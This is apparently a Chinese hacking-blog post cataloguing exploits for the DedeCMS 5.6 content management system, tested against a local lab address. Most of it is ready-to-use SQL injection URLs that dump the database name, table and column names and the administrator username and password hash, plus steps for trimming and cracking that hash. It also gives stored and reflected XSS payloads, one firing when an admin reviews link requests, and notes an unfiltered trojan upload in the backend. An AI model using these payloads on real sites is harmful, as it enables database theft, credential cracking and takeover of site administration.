dedecms5.6漏洞 

阿城's Blog - 关注网络安全 黑客技术爱好者-阿城's Blog是一个关注网络安全,热爱黑客技术,分享各种技术教程资讯 —关注交流|web安全|漏洞发布|网络攻防|信息安全|网站建设



dedecms5.6漏洞

2013-12-16 10:06 作者:阿城 | cms漏洞库 |

SQL注入漏洞1

注入点:http://192.168.1.130/member/buy_action.php?product=
完整payload:

http://192.168.1.130/member/buy_action.php?product=1',1,2,3,4,5,@`'`),((select database()),(select 1),'4

访问http://192.168.1.130/member/operation.php 查询出信息
当前数据库信息dedecmsv56gbk

http://192.168.1.130/member/buy_action.php?product=1',1,2,3,4,5,@`'`),((select table_name from information_schema.tables where table_schema=database() LIMIT 7,1),(select 1),'4

查出表名 dede_admin

http://192.168.1.130/member/buy_action.php?product=1',1,2,3,4,5,@`'`),((select column_name from information_schema.columns where table_name=0x646564655f61646d696e LIMIT 6,1),(select 1),'4

图片1 sql注入漏洞1

SQL注入漏洞2

注入点:http://192.168.1.130/member/mystow.php?type=book'
Payload:http://192.168.1.130/member/mystow.php?type=book' union select 1,2,3,database(),5,6,7,8,9%23

图片2 sql注入漏洞2

SQL注入漏洞3

参考链接http://wooyun.tangscan.cn/static/bugs/wooyun-2014-063441.html
注册用户在笔名中添加如下字符

',char(@`'`),0,0,database(),0,0)#

然后添加一个好友 触发数据库查询,再回到我的织梦中即可看到查询出的数据

图片3 sql注入漏洞3

SQL注入漏洞4

参考链接:http://wooyun.tangscan.cn/static/bugs/wooyun-2014-052214.html
注入点:
http://192.168.1.130/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=
漏洞利用payload

http://192.168.1.130/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%[email protected]`\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%[email protected]__admin`%20limit+0,1),5,6,7,8,9%[email protected]`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294

图片4 sql注入漏洞4

如果是32位MD5减去头5位,减去尾七位
如果是20位MD5密码,前减3后减1,得到16位MD5
将得到的23a7bbd73250516f069d处理后得到7bbd73250516f069,放到cmd5解密得到admin的密码为admin123

0x01 Xss漏洞

Xss漏洞1:

完整payload:
http://192.168.1.130/plus/recommend.php?aid=1&action=sendmail&title=%3Cscript%3Ealert%281%29%3C/script%3E
漏洞证明:

图片5 xss漏洞1

XSS漏洞2

参考链接:
http://wooyun.tangscan.cn/static/bugs/wooyun-2014-065561.html
普通用户申请友情链接,在网站logo处添加

'" onerror=alert(1);//

图片6 xss漏洞2填写信息

触发条件:后台管理员登陆查看友情链接申请触发xss
漏洞证明:

图片7 xss漏洞2触发证明

0x02文件上传漏洞

1,在后台页面文件式管理处,点击上传文件,直接上传木马,没有过滤。

图片8 文件上传漏洞点

文章作者:阿城
文章地址:http://www.ac166.cn/post-156.html
版权所有 © 转载时必须以链接形式注明作者和原始出处!

 

仅供学习与交流,遵循法律法规 & 如有侵犯您的版权请联系我删除 & 手机版

CopyRight © 2016 阿城's Blog - 关注网络安全 黑客技术爱好者.  All rights reserved.